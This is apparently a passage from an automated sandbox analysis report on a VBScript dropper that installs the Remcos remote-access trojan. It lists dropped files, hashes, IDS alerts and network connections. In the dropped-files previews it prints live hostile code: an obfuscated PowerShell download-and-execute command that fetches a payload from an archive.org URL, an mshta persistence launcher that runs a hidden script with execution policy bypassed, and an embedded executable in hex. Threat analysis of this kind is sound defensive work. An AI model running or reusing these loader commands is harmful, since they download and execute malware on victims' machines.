                                                                                                • 207.241.228.140
                                                                                                SecuriteInfo.com.Trojan.GenericKD.36740349.3453.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                Account Details.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                RFQOIL FIELD MARINE OFFSHORE SERVICESFSF62BOPCOSO12A & SO15E.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                Appraisal11002275444900.vbsGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                Pay-u Remittance.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                QTY090900.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                NEW SUPPLIER FORM.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                STATEMENT NO -- NAS-2021-1489.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\Public\ Microsoft.ps1
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):1122932
                                                                                                Entropy (8bit):3.6195801123734963
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:vGXlNr0zk3y3Dv5cuHIrW+15oUy5/1lSXr64jdLPdeCw9Zgd1uSIg4McdU/EjFhK:HWIF/1y
                                                                                                MD5:EDA0264CC0BAA7804CE2A32A99AA9B98
                                                                                                SHA1:274B4D04E802370CAC624649EA30149DDED4E053
                                                                                                SHA-256:950CC79C3173D2A1AD76A7B8E64C9100CA929CAF0201396758380FF2D712680F
                                                                                                SHA-512:43F6DD07E297C157F54147AA34512B4812F2650F990865C81181E14D379BF12352FCC3C2D20FBFB535D8BF2A3B5EBC7AB6AA0CD47AB498F0D1F5818E41BF9A74
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: C:\Users\Public\ Microsoft.ps1, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Preview: [String]$H1='4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000006F78E42D2B198A7E2B198A7E2B198A7E9F857B7E39198A7E9F85797EB4198A7E9F85787E35198A7E783A937E29198A7E663A977E2A198A7EB5B94D7E2A198A7E1047897F31198A7E10478F7F11198A7E10478E7F09198A7E2261197E38198A7E2B198B7E37188A7EBC47837F76198A7EB947757E2A198A7EBC47887F2A198A7E526963682B198A7E0000000000000000504500004C01070039956C600000000000000000E00002010B010E0000100500000A020000000000EFEE020000100000002005000000400000100000000200000500010000000000050001000000000000800700000400000000000002004080000010000010000000001000001000000000000010000000000000000000000038770600DC00000000F00600D04A0000000000000000000000000000000000000040070024380000F05B06003800000000000000000000000000000000000000845C060018000000285C0600400000000000000000000000002005006C0
                                                                                                C:\Users\Public\Run\Run.bat
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):144
                                                                                                Entropy (8bit):4.980054100952451
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:rNk27jGQRAkFVAIUeHHgzGSJJFItGQqPJH0cVER5ZAuaHF5Fg+t4hUv:Zk23GEPNvHAB80QO0cyZAuaHZg+CUv
                                                                                                MD5:F7E3CFAB366105191CED85C7D8563F67
                                                                                                SHA1:51F8DD8C163E7AC0770FFE6DC7FCECADA1F0A5F5
                                                                                                SHA-256:1EFA2367114F60EFA5C9714716072B432F114953A87C533C45EDE565EB5DA079
                                                                                                SHA-512:688A01BB21C4FA9452D50D1299709387CFED843CBA58129244E9D1D704E18EBD1DCA7693FA8160622729F0BD48C42DA0896BC8470C9B9E6D12F399A65846D077
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview: mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\ Microsoft.ps1'"", 0:close")
                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):11883
                                                                                                Entropy (8bit):4.890750684634174
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:4Vsm5emlQib4NxoeR93YrKkX9smlp5b4Q2Ca6pZlbjvwRjdHPRhjiMDOmEN3H+O8:4kib4WF43opbjvwRjdvRZiQ0HzAFaib9
                                                                                                MD5:6049E98CE5D644576C54D3F4844468ED
                                                                                                SHA1:58E3D61381D54FD51C0C913940FF9B952189A5D8
                                                                                                SHA-256:354ADD5966932A0ED1ABE70FE8A1850B215564290661E34E1FBCEB7989AA5803
                                                                                                SHA-512:44878B4BD939DFDB1B34EAEB94280E723FDC3068A1FFC56FA902906669DBDD88F8FEEECC2BE79E838A0841EFBCEE909765F9DE0BAFF01598436C8AC1F6956EAC
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview: PSMODULECACHE......<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3mhniqwj.vsf.psm1
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:very short file (no magic)
                                                                                                Category:dropped
                                                                                                Size (bytes):1
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:U:U
                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview: 1
                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqknuhzr.nmt.psm1
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:very short file (no magic)
                                                                                                Category:dropped
                                                                                                Size (bytes):1
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:U:U
                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview: 1
                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkckfnlm.axd.ps1
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:very short file (no magic)
                                                                                                Category:dropped
                                                                                                Size (bytes):1
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:U:U
                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                Malicious:false
                                                                                                Preview: 1
                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nbyvf4gi.2e2.ps1
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:very short file (no magic)
                                                                                                Category:dropped
                                                                                                Size (bytes):1
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:U:U
                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                Malicious:false
                                                                                                Preview: 1
                                                                                                C:\Users\user\AppData\Roaming\remcos\logs.dat
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):148
                                                                                                Entropy (8bit):6.72627921019431
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:BubaILAF2+CI3rhR5JVsz1mjiQ9S/w4PHvrUqDiGolr9Cin:sbaAu3rvVsz1mjiQ9SY4nrGz
                                                                                                MD5:9FE28208A664DB9CD653324C6653220B
                                                                                                SHA1:FB23DBEAB100296263A41BEACCB30FFD7B019CE3
                                                                                                SHA-256:C2A236B1E56A8118DA9DC76EAA270E20D639BA6D6033234AA9C9728F563E18F5
                                                                                                SHA-512:96B953AB0974730AFFBF4F6D9A5FB750B9183EE7BA5C3D1A4C4338A2D513DCBC4787BE9944C72A103274CA0A991D3F90148AEAE0EFB0579528FD8F1D6E88E7D9
                                                                                                Malicious:true
                                                                                                Preview: .`..X.9.o....,...]..~..-P..%...[.?...R..0...f.O..r....9....o........o.ZaC....ql..6.Lxp..F1.}.@..J.g..8...1>V_.@w.~.|..O.. ....%YW.....,Vg...B..
                                                                                                C:\Users\user\Documents\20210421\PowerShell_transcript.367706.ZKCUyeEJ.20210421153709.txt
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):2545
                                                                                                Entropy (8bit):5.40691350403606
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:BZ7vTLJoOaKFMqDYB1ZhZTqvTLJoOaKFMqDYB1ZkpJ1vqAfG7eJ1vqAfG7d:BZbTLJNlSqDo1ZhZiTLJNlSqDo1ZkpTs
                                                                                                MD5:BE89BE431474522D0993E6401FBE5DCA
                                                                                                SHA1:15C9DE40607705C2189261353E72A04BCF1DF1A7
                                                                                                SHA-256:35866BA6A0B1FC881E454346AE98A64D8E570A660AA2CB952BF46F6B73FB466C
                                                                                                SHA-512:55FCB687B194F9CDAA13ABED6FEA49C11F35BF71ED348CF4963A24991E0DE54C6A94ABCFE82358B761B5F6EE801FC82D61B25E0B73E51B8B17BA4FCF3CB6CE16
                                                                                                Malicious:false
                                                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20210421153709..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windo 1 -noexit -exec bypass -file C:\Users\Public\ Microsoft.ps1..Process ID: 6868..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20210421154228..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windo 1 -n
                                                                                                C:\Users\user\Documents\20210421\PowerShell_transcript.367706.fOfA42_i.20210421153634.txt
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1670
                                                                                                Entropy (8bit):5.573278963172669
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:BZnvTLJoONHcd50T43nqDYB1ZVHcd50Th:BZvTLJNNHS50mqDo1ZVHS50l
                                                                                                MD5:7287E79302DAE4A9A93BB48E5694D7DE
                                                                                                SHA1:8FF90DD7C5B616AC126293DFFB410C5FD1F9409A
                                                                                                SHA-256:43ECAAB26D7124F46272523772CA1ED7E55AD8CBE19CF542F574ED2432177B11
                                                                                                SHA-512:FC56A94CBE9BB275A45EC483B531812AE86E3B69B3413EDC73F76306F41756BE120EDB156D2ADAB49679F6463A7F2CAD3B2B5C910E50C82FF96BE9F73CD1AC78
                                                                                                Malicious:false
                                                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20210421153635..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X..Process ID: 6632..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersio

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:ASCII text, with CRLF line terminators
                                                                                                Entropy (8bit):5.365221582242173
                                                                                                TrID:
                                                                                                  File name:Appraisa.vbs
                                                                                                  File size:662
                                                                                                  MD5:2e95d045ff86903502b52f5fd0976aad
                                                                                                  SHA1:c74e479ff249f1e8c248b8a67e318a61b1f1d5e4
                                                                                                  SHA256:dae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0
                                                                                                  SHA512:0427fa613d91d41c98dfb7d9a964c74857813959f427eb060a1a39c2cf289235aaa0aec6015cea8d7bd16da1e14bae3ba88c998780d33ea6faf9d0b8102264df
                                                                                                  SSDEEP:12:Whmlh4iBHodpd0LynPFhyBF3zTcg3OlXof70jRu+lNmY/OLAW:Wk80Hgd1niBF3zl3Ol4fYRu6NmTLAW
                                                                                                  File Content Preview:Dim ox..Set ox= CreateObject("WScript.Shell")..aa="p" +"o" & "w"..bb="e" & "rs"..cc="h" & "ell"..dd = " $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').R"..ee ="eplace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Re

                                                                                                  File Icon

                                                                                                  Icon Hash:e8d69ece869a9ec4

                                                                                                  Network Behavior

                                                                                                  Snort IDS Alerts

                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                  04/21/21-15:36:30.895509ICMP384ICMP PING192.168.2.693.184.221.240
                                                                                                  04/21/21-15:36:30.930419ICMP449ICMP Time-To-Live Exceeded in Transit84.17.52.126192.168.2.6
                                                                                                  04/21/21-15:36:30.930883ICMP384ICMP PING192.168.2.693.184.221.240
                                                                                                  04/21/21-15:36:30.965981ICMP449ICMP Time-To-Live Exceeded in Transit5.56.20.161192.168.2.6
                                                                                                  04/21/21-15:36:30.967242ICMP384ICMP PING192.168.2.693.184.221.240
                                                                                                  04/21/21-15:36:31.008045ICMP449ICMP Time-To-Live Exceeded in Transit81.95.15.57192.168.2.6
                                                                                                  04/21/21-15:36:31.010844ICMP384ICMP PING192.168.2.693.184.221.240
                                                                                                  04/21/21-15:36:31.053460ICMP449ICMP Time-To-Live Exceeded in Transit152.195.101.202192.168.2.6
                                                                                                  04/21/21-15:36:31.054456ICMP384ICMP PING192.168.2.693.184.221.240
                                                                                                  04/21/21-15:36:31.095745ICMP449ICMP Time-To-Live Exceeded in Transit152.195.101.129192.168.2.6
                                                                                                  04/21/21-15:36:31.097487ICMP384ICMP PING192.168.2.693.184.221.240
                                                                                                  04/21/21-15:36:31.138048ICMP408ICMP Echo Reply93.184.221.240192.168.2.6

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Apr 21, 2021 15:36:37.798676968 CEST49716443192.168.2.6207.241.227.119
                                                                                                  Apr 21, 2021 15:36:37.998881102 CEST44349716207.241.227.119192.168.2.6
                                                                                                  Apr 21, 2021 15:36:37.999038935 CEST49716443192.168.2.6207.241.227.119
                                                                                                  Apr 21, 2021 15:36:38.015621901 CEST49716443192.168.2.6207.241.227.119
                                                                                                  Apr 21, 2021 15:36:38.215732098 CEST44349716207.241.227.119192.168.2.6
                                                                                                  Apr 21, 2021 15:36:38.215948105 CEST44349716207.241.227.119192.168.2.6
                                                                                                  Apr 21, 2021 15:36:38.215981007 CEST44349716207.241.227.119192.168.2.6
                                                                                                  Apr 21, 2021 15:36:38.216006041 CEST44349716207.241.227.119192.168.2.6
                                                                                                  Apr 21, 2021 15:36:38.216022968 CEST44349716207.241.227.119192.168.2.6
                                                                                                  Apr 21, 2021 15:36:38.216057062 CEST49716443192.168.2.6207.241.227.119
                                                                                                  Apr 21, 2021 15:36:38.216070890 CEST49716443192.168.2.6207.241.227.119
                                                                                                  Apr 21, 2021 15:36:38.218630075 CEST44349716207.241.227.119192.168.2.6
                                                                                                  Apr 21, 2021 15:36:38.218647957 CEST44349716207.241.227.119192.168.2.6
                                                                                                  Apr 21, 2021 15:36:38.218822956 CEST49716443192.168.2.6207.241.227.119
                                                                                                  Apr 21, 2021 15:36:38.231710911 CEST49716443192.168.2.6207.241.227.119
                                                                                                  Apr 21, 2021 15:36:38.432408094 CEST44349716207.241.227.119192.168.2.6
                                                                                                  Apr 21, 2021 15:36:38.463846922 CEST49716443192.168.2.6207.241.227.119
                                                                                                  Apr 21, 2021 15:36:38.665452003 CEST44349716207.241.227.119192.168.2.6
                                                                                                  Apr 21, 2021 15:36:38.665479898 CEST44349716207.241.227.119192.168.2.6
                                                                                                  Apr 21, 2021 15:36:38.665635109 CEST49716443192.168.2.6207.241.227.119
                                                                                                  Apr 21, 2021 15:36:39.665543079 CEST44349716207.241.227.119192.168.2.6
                                                                                                  Apr 21, 2021 15:36:39.665575981 CEST44349716207.241.227.119192.168.2.6
                                                                                                  Apr 21, 2021 15:36:39.667232990 CEST49716443192.168.2.6207.241.227.119
                                                                                                  Apr 21, 2021 15:36:53.907334089 CEST49716443192.168.2.6207.241.227.119
                                                                                                  Apr 21, 2021 15:36:53.982124090 CEST49722443192.168.2.6207.241.228.140
                                                                                                  Apr 21, 2021 15:36:54.186433077 CEST44349722207.241.228.140192.168.2.6
                                                                                                  Apr 21, 2021 15:36:54.186671019 CEST49722443192.168.2.6207.241.228.140
                                                                                                  Apr 21, 2021 15:36:54.187385082 CEST49722443192.168.2.6207.241.228.140
                                                                                                  Apr 21, 2021 15:36:54.390470028 CEST44349722207.241.228.140192.168.2.6
                                                                                                  Apr 21, 2021 15:36:54.390527010 CEST44349722207.241.228.140192.168.2.6
                                                                                                  Apr 21, 2021 15:36:54.390547991 CEST44349722207.241.228.140192.168.2.6
                                                                                                  Apr 21, 2021 15:36:54.390567064 CEST44349722207.241.228.140192.168.2.6
                                                                                                  Apr 21, 2021 15:36:54.390578985 CEST44349722207.241.228.140192.168.2.6
                                                                                                  Apr 21, 2021 15:36:54.390669107 CEST49722443192.168.2.6207.241.228.140
                                                                                                  Apr 21, 2021 15:36:54.390724897 CEST49722443192.168.2.6207.241.228.140
                                                                                                  Apr 21, 2021 15:36:54.392797947 CEST44349722207.241.228.140192.168.2.6
                                                                                                  Apr 21, 2021 15:36:54.392833948 CEST44349722207.241.228.140192.168.2.6
                                                                                                  Apr 21, 2021 15:36:54.392971992 CEST49722443192.168.2.6207.241.228.140
                                                                                                  Apr 21, 2021 15:36:54.394560099 CEST49722443192.168.2.6207.241.228.140
                                                                                                  Apr 21, 2021 15:36:54.598280907 CEST44349722207.241.228.140192.168.2.6
                                                                                                  Apr 21, 2021 15:36:54.600944996 CEST44349722207.241.228.140192.168.2.6
                                                                                                  Apr 21, 2021 15:36:54.602577925 CEST49722443192.168.2.6207.241.228.140
                                                                                                  Apr 21, 2021 15:36:54.804791927 CEST44349722207.241.228.140192.168.2.6
                                                                                                  Apr 21, 2021 15:36:54.804821968 CEST44349722207.241.228.140192.168.2.6
                                                                                                  Apr 21, 2021 15:36:54.848720074 CEST49722443192.168.2.6207.241.228.140
                                                                                                  Apr 21, 2021 15:36:55.830255985 CEST44349722207.241.228.140192.168.2.6
                                                                                                  Apr 21, 2021 15:36:55.830287933 CEST44349722207.241.228.140192.168.2.6
                                                                                                  Apr 21, 2021 15:36:55.830871105 CEST49722443192.168.2.6207.241.228.140
                                                                                                  Apr 21, 2021 15:36:59.887038946 CEST49727443192.168.2.6207.241.227.121
                                                                                                  Apr 21, 2021 15:37:00.089093924 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.089308977 CEST49727443192.168.2.6207.241.227.121
                                                                                                  Apr 21, 2021 15:37:00.089762926 CEST49727443192.168.2.6207.241.227.121
                                                                                                  Apr 21, 2021 15:37:00.289805889 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.289962053 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.289989948 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.290007114 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.290019989 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.290095091 CEST49727443192.168.2.6207.241.227.121
                                                                                                  Apr 21, 2021 15:37:00.290128946 CEST49727443192.168.2.6207.241.227.121
                                                                                                  Apr 21, 2021 15:37:00.292644978 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.292671919 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.292876005 CEST49727443192.168.2.6207.241.227.121
                                                                                                  Apr 21, 2021 15:37:00.296108007 CEST49727443192.168.2.6207.241.227.121
                                                                                                  Apr 21, 2021 15:37:00.497781992 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.498446941 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.499718904 CEST49727443192.168.2.6207.241.227.121
                                                                                                  Apr 21, 2021 15:37:00.700664997 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.728194952 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.728225946 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.728239059 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.728256941 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.728272915 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.728288889 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.728307009 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.728327036 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.728343964 CEST49727443192.168.2.6207.241.227.121
                                                                                                  Apr 21, 2021 15:37:00.728352070 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.728370905 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.728383064 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.728394985 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.728399038 CEST49727443192.168.2.6207.241.227.121
                                                                                                  Apr 21, 2021 15:37:00.728405952 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.728496075 CEST49727443192.168.2.6207.241.227.121
                                                                                                  Apr 21, 2021 15:37:00.931282043 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.931308985 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.931328058 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.931344986 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.931361914 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.931377888 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.931396008 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.931415081 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.931432009 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.931441069 CEST49727443192.168.2.6207.241.227.121
                                                                                                  Apr 21, 2021 15:37:00.931447983 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.931468010 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.931483984 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.931483030 CEST49727443192.168.2.6207.241.227.121
                                                                                                  Apr 21, 2021 15:37:00.931499958 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.931516886 CEST44349727207.241.227.121192.168.2.6
                                                                                                  Apr 21, 2021 15:37:00.931533098 CEST44349727207.241.227.121192.168.2.6

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Apr 21, 2021 15:36:24.675837040 CEST5772553192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:24.733067989 CEST53577258.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:24.792572021 CEST4928353192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:24.842449903 CEST53492838.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:25.355819941 CEST5837753192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:25.398221016 CEST5507453192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:25.423491955 CEST53583778.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:25.465262890 CEST53550748.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:25.957779884 CEST5451353192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:26.006359100 CEST53545138.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:26.730195045 CEST6204453192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:26.780277967 CEST53620448.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:28.063811064 CEST6379153192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:28.121189117 CEST53637918.8.8.8192.168.2.6
                                                                                                  Apr 21, 2021 15:36:28.968277931 CEST6426753192.168.2.68.8.8.8
                                                                                                  Apr 21, 2021 15:36:29.025302887 CEST53642678.8.8.8192.168.2.6
